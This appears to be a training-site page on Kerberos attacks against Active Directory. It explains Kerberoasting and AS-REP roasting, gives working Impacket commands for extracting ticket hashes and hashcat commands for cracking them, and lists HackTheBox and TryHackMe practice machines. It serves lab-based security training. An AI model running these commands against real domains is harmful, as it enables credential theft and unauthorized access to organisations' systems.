ZeroBox

Kerberos Attacks: practice machines and key commands

Kerberos is the default authentication protocol in Active Directory, and several of its design details are abusable. Kerberoasting requests service tickets for accounts with a servicePrincipalName and cracks the encrypted part offline, which works for any domain user. AS-REP roasting targets accounts that do not require pre-authentication and needs no credentials at all if you can guess usernames. Forged tickets, such as silver tickets built from a service account hash, give access to one service without touching the domain controller. Clock skew breaks everything, so sync time with the DC before you start. After capturing a hash, pick the right hashcat mode (13100 for TGS, 18200 for AS-REP) and check whether the recovered password is reused elsewhere. The boxes listed here exercise these attacks from both the Linux and Windows side.

Key commands

Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.

Impacket GetUserSPNs (Kerberoasting)

Request Kerberos TGS tickets for accounts with SPNs and output format for Hashcat / John.

impacket-GetUserSPNs {DOMAIN}/{USER}:{PASSWORD} -dc-ip {TARGET_IP} -request -outputfile hashes.kerberoast

Impacket GetNPUsers (AS-REP Roasting)

Query users with DONT_REQ_PREAUTH set to retrieve crackable Kerberos AS-REP hashes without creds.

impacket-GetNPUsers {DOMAIN}/ -usersfile users.txt -dc-ip {TARGET_IP} -format hashcat -outputfile asreproast.hashes

Hashcat Kerberos 5 TGS (Mode 13100)

Crack Kerberoasted Service Principal Name tickets to reveal service account passwords.

hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt -O

Hashcat Kerberos 5 AS-REP (Mode 18200)

Crack AS-REP hashes captured for accounts with Kerberos preauthentication disabled.

hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt -O

Keep going

Kerberos Attacks machines (16)

Machines are matched by their technique tags. 16 Windows.

Easy (2)

MachinePlatformOSTags
ForestHTBWindowsAS-REP Roasting, ASREPRoasting, Active Directory, BloodHound
SaunaHTBWindowsAS-REP Roasting, ASREPRoasting-Attack, Active Directory, BloodHound

Medium (8)

MachinePlatformOSTags
AdministratorHTBWindowsActiveDirectory, ADCS, Golden-Cert, Kerberoasting
Attacking KerberosTHMWindowsKerberos, ASREPRoast, Kerberoasting, Silver Ticket
Attacktive DirectoryTHMWindowsActiveDirectory, Kerberos, ASREPRoast, Secretsdump
EdenTHMWindowsActive Directory, Kerberos, Pass-the-Ticket, BloodHound
Exploiting Active DirectoryTHMWindowsActive Directory, Kerberoasting, ASREPRoasting, Pass-the-Hash
ScrambledHTBWindowsActive Directory, Deserialization, Deserialization-attacks, Kerberoasting
VulnNet: RoastedTHMWindowsActiveDirectory, Kerberos, ASREPRoast, GPO
ZaTHMWindowsActive Directory, Kerberos, BloodHound, GPO Abuse

Hard (5)

MachinePlatformOSTags
BlackfieldHTBWindowsAS-REP Roasting, Active Directory, Anonymous-/-Guest, BloodHound
EnterpriseTHMWindowsActive Directory, ZeroLogon, SQLi, Privilege Escalation
HoloTHMWindowsActive Directory, Multi-Host, Kerberos, BloodHound
MantisHTBWindowsHTB, Kerberos, databases
Raz0rBlackTHMWindowsActive Directory, NFS, Kerberos, AS-REP Roasting

Insane (1)

MachinePlatformOSTags
SizzleHTBWindowsDCSync, HTB, Kerberoasting, Passwordless-login

Related techniques

Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox